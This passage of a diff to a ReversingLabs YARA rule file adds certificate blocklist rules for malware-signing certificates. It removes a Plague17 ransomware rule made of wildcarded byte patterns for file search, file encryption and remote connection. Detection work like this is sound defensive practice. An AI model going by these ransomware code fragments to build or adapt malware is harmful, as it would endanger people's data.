+		author = "ReversingLabs"
+		id = "73f4d6e2-6924-59fa-8ec1-305f2d5dc5a3"
+		date = "2020-08-05"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L12236-L12254"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
+		logic_hash = "302e2d6b31ca5c2c33c4ec7294630fd88a9c40f70ddecdc606ccff27b24e1cd4"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( $encrypt_files ) and ( $exec_proc )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE9\\x83\\xB4\\xE5\\xB7\\x9E\\xE8\\x9C\\x97\\xE7\\x89\\x9B\\xE7\\xBD\\x91\\xE7\\xBB\\x9C\\xE7\\xA7\\x91\\xE6\\x8A\\x80\\xE6\\x9C\\x89\\xE9\\x99\\x90\\xE5\\x85\\xAC\\xE5\\x8F\\xB8" and ( pe.signatures [ i ] . serial == "00:af:c0:dd:b7:bd:c8:20:7e:8c:3b:72:04:01:8e:ec:d3" or pe.signatures [ i ] . serial == "af:c0:dd:b7:bd:c8:20:7e:8c:3b:72:04:01:8e:ec:d3" ) and 1629676800 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Plague17 : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_38989Ec61Ecdb7391Ff5647F7D58Ad18 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Plague17 ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "065c47b5-f459-529e-8046-7394a742b50a"
-		date = "2021-02-19"
-		modified = "2021-02-19"
+		id = "1841bbd1-4c7a-5b89-8c63-58d8a3ae1cef"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Plague17.yara#L1-L263"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L12256-L12272"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "e0e518fc83a62d70b83df273c6ba469e6f0fdf9c035126428ec7561e04437b6f"
+		logic_hash = "1795812d4daa458b157280cac7a9b13e9b67a2d78eac077691bbce2bf8aeec34"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Plague17"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files_p1 = {
-            55 89 E5 57 56 8D 85 ?? ?? ?? ?? 53 81 EC ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 31 C0 66 89
-            85 ?? ?? ?? ?? 8B 45 ?? 89 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8B 50 ?? 8B
-            00 66 83 7C 50 ?? ?? 74 ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 4D ?? BA ?? ?? ??
-            ?? 2B 51 ?? 39 D0 0F 87 ?? ?? ?? ?? 8B 4D ?? 89 44 24 ?? C7 04 24 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 8B 45 ?? 8B 7D ?? 83 EC ?? 8B 00 8B 57 ?? 8D 8D ?? ?? ?? ?? 8D 14 50 C6 44
-            24 ?? ?? 89 04 24 89 8D ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 89 54 24 ?? E8 ?? ?? ?? ?? 83
-            EC ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 2B 95 ?? ?? ?? ?? 39 D0 0F
-            87 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 89 44 24 ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D
-            85 ?? ?? ?? ?? 83 EC ?? 8D 8D ?? ?? ?? ?? 8D BD ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ??
-            8B 85 ?? ?? ?? ?? 83 EC ?? 39 F8 74 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 8B 7D ?? 8D
-        }
-		$find_files_p2 = {
-            9D ?? ?? ?? ?? 8D B5 ?? ?? ?? ?? 89 D9 8B 00 C6 44 24 ?? ?? 8B 57 ?? 89 B5 ?? ?? ??
-            ?? 89 04 24 8D 14 50 89 54 24 ?? E8 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 83 EC ?? 89 1C 24
-            E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 EC ?? 39 F0 74 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 85
-            ?? ?? ?? ?? 89 5C 24 ?? 89 04 24 FF 15 ?? ?? ?? ?? 83 EC ?? 83 F8 ?? 89 C6 0F 84 ??
-            ?? ?? ?? 8D BD ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 3C 24 E8 ?? ?? ?? ?? 85 C0 74
-            ?? C7 44 24 ?? ?? ?? ?? ?? 89 3C 24 E8 ?? ?? ?? ?? 85 C0 74 ?? 8B 45 ?? F6 85 ?? ??
-            ?? ?? ?? 89 7C 24 ?? 89 44 24 ?? 8D 85 ?? ?? ?? ?? 89 04 24 0F 85 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 8B 85 ?? ?? ??
-            ?? 8D 8D ?? ?? ?? ?? 83 EC ?? 39 C8 74 ?? 89 04 24 E8 ?? ?? ?? ?? EB ?? C7 44 24 ??
-            ?? ?? ?? ?? 89 3C 24 E8 ?? ?? ?? ?? 85 C0 75 ?? 89 5C 24 ?? 89 34 24 FF 15 ?? ?? ??
-            ?? 83 EC ?? 85 C0 75 ?? 89 34 24 FF 15 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 9D ?? ?? ??
-            ?? 83 EC ?? 39 D8 74 ?? 89 04 24 E8 ?? ?? ?? ?? 8D 65 ?? 5B 5E 5F 5D C2 ?? ?? 8D 76
-            ?? 8D BC 27 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 3C 24 E8 ?? ?? ?? ?? 85 C0 74
-        }
-		$find_files_p3 = {
-            8B 45 ?? F6 85 ?? ?? ?? ?? ?? 89 7C 24 ?? 89 44 24 ?? 8D 85 ?? ?? ?? ?? 89 04 24 75
-            ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? E9 ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ??
-            8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 83 EC ?? 39 D0 0F 85 ?? ?? ?? ?? E9 ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? EB ?? 89
-            C3 8B 85 ?? ?? ?? ?? 8D B5 ?? ?? ?? ?? 39 F0 74 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 85 ??
-            ?? ?? ?? 8D B5 ?? ?? ?? ?? 39 F0 74 ?? 89 04 24 E8 ?? ?? ?? ?? 89 1C 24 E8 ?? ?? ??
-            ?? EB ?? 89 C3 8B 85 ?? ?? ?? ?? 39 F0 75 ?? EB ?? EB ?? EB ?? 89 C3 EB ?? C7 04 24
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? EB
-        }
-		$encrypt_files_p1 = {
-            55 89 E5 57 56 53 81 EC ?? ?? ?? ?? 8B 45 ?? 89 8D ?? ?? ?? ?? C7 44 24 ?? ?? ?? ??
-            ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24
-            ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8B 00 89 04 24 FF 15 ?? ?? ?? ?? 83 EC ?? 83
-            F8 ?? 89 85 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 89 C6 8D 85 ?? ?? ?? ?? 8D BD ?? ?? ?? ??
-            89 34 24 89 44 24 ?? FF 15 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 EC ?? 8B 95 ?? ?? ?? ??
-            89 7C 24 ?? C7 44 24 ?? ?? ?? ?? ?? 8D BD ?? ?? ?? ?? 89 34 24 05 ?? ?? ?? ?? 89 85
-            ?? ?? ?? ?? 89 44 24 ?? 83 D2 ?? A1 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 89 54 24 ?? 89 85
-            ?? ?? ?? ?? FF D0 31 C0 83 EC ?? 83 BD ?? ?? ?? ?? ?? B9 ?? ?? ?? ?? F3 AB 7C ?? 0F
-            8E ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8D B5 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24
-            ?? ?? ?? ?? ?? 89 44 24 ?? 8B 85 ?? ?? ?? ?? 89 74 24 ?? 89 04 24 FF 15 ?? ?? ?? ??
-            83 EC ?? 8D 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 83 EC ?? 85 C0 0F
-            85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 35 ?? ?? ?? ?? 0B 85 ?? ?? ?? ?? 0F 85 ?? ?? ?? ??
-            80 7D ?? ?? 0F 85 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 C3 8D 85 ?? ??
-            ?? ?? 89 D9 89 04 24 89 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 95 ?? ??
-            ?? ?? 83 EC ?? 8B B5 ?? ?? ?? ?? 89 D9 89 85 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 8B 85 ??
-            ?? ?? ?? 8B 95 ?? ?? ?? ?? 89 1E 0F A4 C2 ?? C1 E0 ?? 89 95 ?? ?? ?? ?? 89 85 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 85 ??
-            ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D
-        }
-		$encrypt_files_p2 = {
-            85 ?? ?? ?? ?? 89 04 24 8B 0E E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 EC ?? 89 04 24 8B
-            85 ?? ?? ?? ?? 89 44 24 ?? 8B 85 ?? ?? ?? ?? 89 44 24 ?? 8B 85 ?? ?? ?? ?? 89 44 24
-            ?? 8B 0E E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 83 EC ?? 89 04 24 89 54
-            24 ?? 8B 0E 8D B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B BD ?? ?? ?? ?? 83 EC ?? 8B 85 ?? ??
-            ?? ?? 85 FF 0F 84 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 95
-            ?? ?? ?? ?? 8D BD ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 7C 24 ?? 89 44 24 ?? 8B 85
-            ?? ?? ?? ?? 89 54 24 ?? 89 04 24 FF 95 ?? ?? ?? ?? 83 EC ?? C6 45 ?? ?? C7 04 24 ??
-            ?? ?? ?? E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 04 24 89
-            85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 2B 85 ?? ?? ?? ?? 8B 95 ?? ?? ?? ??
-            1B 95 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 0F AC D0 ?? C1 EA ?? 89 D3 09
-            C3 0F 84 ?? ?? ?? ?? 83 C0 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ??
-            ?? ?? 89 85 ?? ?? ?? ?? A1 ?? ?? ?? ?? 83 D2 ?? 89 95 ?? ?? ?? ?? 89 85 ?? ?? ?? ??
-            90 8D B4 26 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 74 24 ?? C7 44
-            24 ?? ?? ?? ?? ?? 89 44 24 ?? 8B 85 ?? ?? ?? ?? 89 04 24 FF 95 ?? ?? ?? ?? 8B 8D ??
-            ?? ?? ?? 8B 9D ?? ?? ?? ?? 83 EC ?? 8B 95 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 5C
-        }
-		$encrypt_files_p3 = {
-            24 ?? 89 0C 24 8B 0A E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 83 EC ?? 8B
-            9D ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 7C 24 ?? 89 44 24 ?? 89 54 24 ?? 89 1C 24
-            FF 95 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 83 EC ?? 89 9D ?? ?? ?? ?? C7 44 24 ?? ?? ?? ??
-            ?? 89 74 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 1C 24 89 4C 24 ?? FF 15 ?? ?? ?? ?? 8B 85
-            ?? ?? ?? ?? 83 EC ?? 8B 95 ?? ?? ?? ?? 8D 9D ?? ?? ?? ?? 81 85 ?? ?? ?? ?? ?? ?? ??
-            ?? C7 44 24 ?? ?? ?? ?? ?? 83 95 ?? ?? ?? ?? ?? 89 44 24 ?? 8B 85 ?? ?? ?? ?? 89 5C
-            24 ?? 89 54 24 ?? 89 04 24 FF 95 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 9D ?? ?? ?? ?? 83
-            EC ?? 81 85 ?? ?? ?? ?? ?? ?? ?? ?? 89 D9 83 95 ?? ?? ?? ?? ?? 8B 02 89 04 24 E8 ??
-            ?? ?? ?? 8B 9D ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 83 EC ?? 8B 95 ?? ?? ?? ?? 8B 85 ?? ??
-            ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 89 8D
-            ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 8B 0B 89 85 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 04 24 8B 0B E8 ?? ?? ?? ?? 8B 85 ?? ?? ??
-            ?? 83 EC ?? 89 04 24 8B 85 ?? ?? ?? ?? 89 44 24 ?? 8B 85 ?? ?? ?? ?? 89 44 24 ?? 8B
-            85 ?? ?? ?? ?? 89 44 24 ?? 8B 0B E8 ?? ?? ?? ?? 8B 0B 83 EC ?? E8 ?? ?? ?? ?? 8B 9D
-            ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? C7 44 24 ?? ?? ??
-            ?? ?? 89 74 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 54 24 ?? 89 1C 24 FF 15 ?? ?? ?? ?? 8B
-        }
-		$encrypt_files_p4 = {
-            85 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 83 EC ?? C7 44 24 ?? ?? ?? ?? ?? 89 7C 24 ?? 89 1C
-            24 89 44 24 ?? 89 54 24 ?? FF 95 ?? ?? ?? ?? 83 EC ?? 83 85 ?? ?? ?? ?? ?? 8B 9D ??
-            ?? ?? ?? 83 95 ?? ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 85 ?? ?? ?? ??
-            31 CB 31 D0 89 DA 09 C2 0F 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 2B 85 ?? ?? ?? ?? 8B 95
-            ?? ?? ?? ?? 1B 95 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 8B 8D ?? ?? ?? ??
-            8B 85 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 74 24 ?? 89 4C 24 ?? 8B 8D ?? ?? ?? ??
-            89 C3 89 44 24 ?? 89 0C 24 FF 95 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 83 EC ?? 8B 85 ?? ??
-            ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 54 24 ?? 8B 95 ?? ?? ?? ?? 89 14 24 8B 08 E8 ?? ??
-            ?? ?? 83 EC ?? 8B 85 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 89 7C 24 ?? 8B BD ?? ?? ?? ?? C7
-            44 24 ?? ?? ?? ?? ?? 89 44 24 ?? 89 54 24 ?? 89 3C 24 FF 95 ?? ?? ?? ?? 83 EC ?? 8B
-            95 ?? ?? ?? ?? 89 BD ?? ?? ?? ?? 89 5C 24 ?? 8B 1D ?? ?? ?? ?? C7 44 24 ?? ?? ?? ??
-            ?? 89 74 24 ?? 89 54 24 ?? 89 3C 24 89 9D ?? ?? ?? ?? FF D3 8B 95 ?? ?? ?? ?? 8B 85
-            ?? ?? ?? ?? 8D 9D ?? ?? ?? ?? 83 EC ?? B9 ?? ?? ?? ?? C7 85
-        }
-		$encrypt_files_p5 = {
-            89 DF C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 0F AC D0 ?? C1 EA
-            ?? 01 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 11 95 ?? ?? ?? ?? 31 C0 C7 85 ??
-            ?? ?? ?? ?? ?? ?? ?? F3 AB C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? C7 85 ?? ??
-            ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 45
-            ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? C7 44 24 ?? ??
-            ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 04 24 89 54 24 ?? E8 ?? ?? ?? ?? 8B BD ?? ?? ??
-            ?? C7 44 24 ?? ?? ?? ?? ?? 89 44 24 ?? 89 5C 24 ?? C7 04 24 ?? ?? ?? ?? 89 85 ?? ??
-            ?? ?? 89 7C 24 ?? E8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 31 C0 F3 AB 8B BD ?? ?? ?? ?? 89 74
-            24 ?? 8D B5 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 74 24 ??
-            89 3C 24 FF 95 ?? ?? ?? ?? 83 EC ?? 89 3C 24 FF 15 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83
-            EC ?? 8B 18 85 DB 74 ?? 89 D9 E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 1C 24 E8 ??
-            ?? ?? ?? 8B 85 ?? ?? ?? ?? C7 00 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ??
-            ?? 8D 65 ?? 31 C0 5B 5E 5F 5D C2 ?? ?? 8D BD ?? ?? ?? ?? 31 C0 B9 ?? ?? ?? ?? 8B B5
-            ?? ?? ?? ?? 31 D2 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? F3 AB 8B BD ?? ?? ?? ?? C7 85 ?? ??
-            ?? ?? ?? ?? ?? ?? 89 F9 C1 F9 ?? 83 E1 ?? 89 C8 01 F0 11 FA 0F AC D0 ?? C1 FA ?? 83
-        }
-		$encrypt_files_p6 = {
-            C0 ?? 83 D2 ?? 0F A4 C2 ?? C1 E0 ?? 89 95 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 89 FA 09 F2
-            89 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 8D 85 ?? ??
-            ?? ?? 8D 95 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 F7 C6 00 ?? 83 C0 ?? 39 C2 75 ?? 89 BD
-            ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 C3 8B 85 ?? ?? ?? ?? 89 D9 89 04
-            24 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 EC ?? 89 18 A1 ?? ?? ?? ?? 89 44 24 ?? 8D 85
-            ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 4D ?? 89
-            44 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 75 ?? 83 C0
-            ?? 83 EC ?? 8B 56 ?? 39 D0 0F 87 ?? ?? ?? ?? 8B 7D ?? 29 C2 8D B5 ?? ?? ?? ?? 8D 9D
-            ?? ?? ?? ?? 8B 0F C6 44 24 ?? ?? 89 9D ?? ?? ?? ?? 8D 0C 41 8D 04 51 89 0C 24 89 F1
-            89 44 24 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 EC ?? 89 34 24 8D 48 ?? E8 ?? ?? ??
-            ?? 8B 85 ?? ?? ?? ?? 83 EC ?? 39 D8 74 ?? 89 04 24 E8 ?? ?? ?? ?? 8B BD ?? ?? ?? ??
-            8D B5 ?? ?? ?? ?? 8D 9D ?? ?? ?? ?? 8B 47 ?? 89 34 24 89 44 24 ?? E8 ?? ?? ?? ?? 8B
-            85 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B 0F C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ??
-            ?? ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 66 90 89 34 24 8B
-            0F 83 C6 ?? E8 ?? ?? ?? ?? 83 EC ?? 39 DE 75 ?? 8B BD ?? ?? ?? ?? 8B B5
-        }
-		$encrypt_files_p7 = {
-            8B 0F E8 ?? ?? ?? ?? 8B 07 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ??
-            ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 89
-            04 24 E8 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 83 EC ?? 8B 85 ?? ?? ?? ??
-            8B 9D ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 8B 0F 89 95 ?? ?? ?? ?? 89 95
-            ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 04 24 8B 0F E8 ?? ?? ?? ?? 8B 0F 83 EC ?? E8 ??
-            ?? ?? ?? 8B 0F 89 F7 E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 95 ?? ??
-            ?? ?? 8B 95 ?? ?? ?? ?? 89 34 24 8D B5 ?? ?? ?? ?? 89 44 24 ?? 8B 85 ?? ?? ?? ?? C7
-            44 24 ?? ?? ?? ?? ?? 89 54 24 ?? 89 44 24 ?? FF 95 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 83
-            EC ?? 89 3C 24 C7 44 24 ?? ?? ?? ?? ?? 89 74 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 44 24
-            ?? FF 15 ?? ?? ?? ?? 8B BD ?? ?? ?? ?? 83 EC ?? 8B 85 ?? ?? ?? ?? 85 FF 0F 85 ?? ??
-            ?? ?? 3D ?? ?? ?? ?? 0F 87 ?? ?? ?? ?? 3D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ??
-            0F 87 ?? ?? ?? ?? 3D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 0F 87 ?? ?? ?? ?? 3D
-            ?? ?? ?? ?? 0F 97 C0 0F B6 C0 89 85 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 65 ?? B8 ?? ?? ??
-            ?? 5B 5E 5F 5D C2 ?? ?? 8B 85 ?? ?? ?? ?? 89 04 24 FF 15 ?? ?? ?? ?? 83 EC ?? 8D 65
-            ?? B8 ?? ?? ?? ?? 5B 5E 5F 5D C2 ?? ?? 8B 85 ?? ?? ?? ?? 89 04 24 FF 15
-        }
-		$encrypt_files_p8 = {
-            83 EC ?? 8D 65 ?? 31 C0 5B 5E 5F 5D C2 ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7
-            04 24 ?? ?? ?? ?? 89 C6 89 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 04 24 C1 F8 ?? 89 F1 89
-            44 24 ?? 8D B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 83 EC ?? 89 B5 ?? ?? ??
-            ?? 89 85 ?? ?? ?? ?? 89 C3 A1 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 85
-            ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 8B BD ?? ?? ?? ?? 89
-            04 24 89 54 24 ?? 89 74 24 ?? 89 7C 24 ?? E8 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 8B BD ??
-            ?? ?? ?? 89 95 ?? ?? ?? ?? 89 54 24 ?? 89 85 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89
-            7C 24 ?? 89 44 24 ?? 89 34 24 FF 95 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 EC ?? 89 5C 24
-            ?? C7 44 24 ?? ?? ?? ?? ?? 83 C3 ?? C7 44 24 ?? ?? ?? ?? ?? 89 34 24 89 44 24 ?? FF
-            95 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 83 EC ?? 39 C3 0F 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ??
-            C7 44 24 ?? ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 76 ?? 81 BD ?? ??
-            ?? ?? ?? ?? ?? ?? 0F 86 ?? ?? ?? ?? E9 ?? ?? ?? ?? A1 ?? ?? ?? ?? 89 85 ?? ?? ?? ??
-            E9 ?? ?? ?? ?? 89 54 24 ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 89 C6 C7 44 24 ?? ?? ?? ?? ?? 89 1C 24 E8 ?? ?? ?? ?? 89 34 24 E8 ??
-            ?? ?? ?? 89 C3 8B 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 89 1C 24 E8 ?? ?? ?? ?? EB
-          }
-		$remote_connection_p1 = {
-            55 57 56 53 81 EC ?? ?? ?? ?? 8B 1A 39 18 0F 84 ?? ?? ?? ?? 89 54 24 ?? 89 C6 8D 5C
-            24 ?? F6 05 ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? B8 ?? ?? ?? ?? 89 DF 8B 56 ?? 89 54 24
-            ?? 8B 56 ?? 89 54 24 ?? 8B 56 ?? 89 54 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 44 24 ?? 89
-            3C 24 E8 ?? ?? ?? ?? 89 3C 24 E8 ?? ?? ?? ?? 01 C7 89 F8 29 D8 BA ?? ?? ?? ?? 89 D5
-            29 C5 F6 05 ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 8B 06 89 44 24 ?? 8B 46 ?? 89 44 24 ??
-            C7 44 24 ?? ?? ?? ?? ?? 89 6C 24 ?? 89 3C 24 E8 ?? ?? ?? ?? 89 5C 24 ?? 8B 7C 24 ??
-            8B 07 89 04 24 E8 ?? ?? ?? ?? FF 47 ?? 8B 46 ?? 01 47 ?? 8B 6E ?? 85 ED 0F 84 ?? ??
